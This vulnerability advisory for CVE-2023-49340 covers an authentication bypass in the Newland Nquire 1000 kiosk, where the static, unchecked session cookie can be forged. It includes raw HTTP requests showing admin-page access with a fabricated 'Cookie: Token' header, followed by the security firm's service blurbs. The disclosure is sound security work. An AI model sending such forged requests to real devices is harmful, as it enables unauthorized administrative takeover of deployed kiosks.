Nov 27, 2023
CVE-2023-49340
Deiby Gerez (n0obit4) of Pentraze Cybersecurity
An improper access control vulnerability was discovered in Newland Nquire 1000 Interactive Kiosk. This vulnerability enables an unauthenticated actor to bypass the login process, gaining unauthorized access to the administrative portal and allowing the execution of privileged actions.
8.8 (High) - CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
On successful login, a cookie is returned with the following value Token: 12345678, this key-pair value is used as session token to identify a logged-on users on the web application.
The key-pair value is static and is not properly verified by the web application, allowing an adversary to forge a cookie (e.g Cookie: Token: n0obit4) to gain full control over the management portal and perform privileged actions.
In the following proof of concept i’ll perform a request without session cookie and other with a random cookie.
Normal flow without authentication
Request:
GET /log.htm HTTP/1.1
Host: 192.168.3.216
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b2;q=0.7
Referer: http://192.168.3.216/left.htm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
If-None-Match: 1f7bbba0
Connection: close
Response
Authentication bypass
Request
GET /log.htm HTTP/1.1
Host: 192.168.3.216
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b2;q=0.7
Referer: http://192.168.3.216/left.htm
Accept-Encoding: gzip, deflate
Cookie: Token: n0obit4
Accept-Language: en-US,en;q=0.9
If-None-Match: 1f7bbba0
Response
Proactive assessment using tactics, techniques, and procedures of actual attackers to identify security flaws, incorrect configurations, and vulnerabilities.
Comprehensive application protection, ensuring robust security throughout the entire software development lifecycle.
Simulate and emulate advanced cyber attacks to pinpoint vulnerabilities and test your organization's defense mechanisms, ensuring robust resilience against real-world threats.
Proactive process to identify, prioritize, and address security vulnerabilities in systems and software, enhancing an organization's defense against evolving cyber threats.